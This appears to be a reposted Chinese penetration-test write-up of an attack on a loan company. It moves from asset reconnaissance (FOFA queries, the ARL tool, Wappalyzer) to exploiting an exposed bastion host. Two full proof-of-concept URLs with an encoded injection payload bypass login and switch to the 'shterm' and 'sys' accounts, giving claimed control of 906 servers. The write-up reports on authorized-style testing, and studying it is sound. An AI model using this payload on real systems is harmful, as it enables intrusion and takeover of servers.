!
也想出现在这里? 联系我们
创意广告

记一次某贷款公司从0到100的渗透测试记录

前言
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。漏洞测试结束后已将漏洞提交漏洞平台。
一、信息收集
首先通过爱企查找到某某贷款公司,查看备案域名,进行子域名收集,以及fofa收集
图片[1]-记一次某贷款公司从0到100的渗透测试记录-安全小天地
图1-1 爱企查备案站点收集
将发现的域名可通过灯塔以及fofa进行收集,备案号也可进行收集遍历后面的号数
域名fofa语法:domain=xxx.com
备案号fofa语法:body=xxICP备xxxx号-x
图片[2]-记一次某贷款公司从0到100的渗透测试记录-安全小天地
图片[3]-记一次某贷款公司从0到100的渗透测试记录-安全小天地
图1-2 1-3 为fofa资产收集
灯塔收集:
图片[4]-记一次某贷款公司从0到100的渗透测试记录-安全小天地
图1-4 资产灯塔系统资产收集
这里推介使用灯塔进行收集,因为很多小的收集工具已经集成在灯塔里了,我们就不需要在去挨个下了,但是如果对方是有waf秒封的ip的话还是推介人工收集,方法就以上几种不多说了
二、漏洞发现
此时我们可以将收集的资产先放扫描器过一遍,扫描器扫的同时我们就手工测试对方系统的逻辑漏洞、cms漏洞、反序列化漏洞等等,这里呢我推介大家使用一个谷歌插件Wappalyzer,此插件的好处可以识别对方使用的cms系统以及用的编程语言、中间件、操作系统等,这样不仅免去了我们手工测试的麻烦还可以第一时间通过得到的上述信息精准打击
图片[5]-记一次某贷款公司从0到100的渗透测试记录-安全小天地
图2-1 Wappalyzer网站技术分析插件
通过收集和扫描将近三四个小时的努力发现了对方将堡垒机映射出外网,且该堡垒机在2021年4月通报过一个高危漏洞:任意用户登录,通过poc探测对方存在此漏洞
https://xxx.xxx.com:6443/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
图片[6]-记一次某贷款公司从0到100的渗透测试记录-安全小天地
图2-2 poc测试图
三、漏洞利用
首先通过poc测试的漏洞来进行查看用户以及切换切换用户
图片[7]-记一次某贷款公司从0到100的渗透测试记录-安全小天地
图3-1 会话审计图
通过会话发现对方近期都有登录过堡垒机里的机器,此时尝试将审计用户切换为配置管理员查看对方的哪一个用户掌管机器的
图片[8]-记一次某贷款公司从0到100的渗透测试记录-安全小天地
图3-2 配置用户关联设备
通过图3-2知道了大量设备都于sys这个用户有关联,因此我们直接切换该用户进行查看
https://xxx.xxx.com:6443/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=sys
图片[9]-记一次某贷款公司从0到100的渗透测试记录-安全小天地
图 3-3 sys普通用户权限图
通过3-3可知已将对方打穿,可管控服务器906台,至此渗透结束
结束语
本文章主要讲解了从信息收集到漏洞发现以及利用的全过程,其实漏洞不止这一个但是此漏洞具有代表性,感谢各位师傅观看!

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞12 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容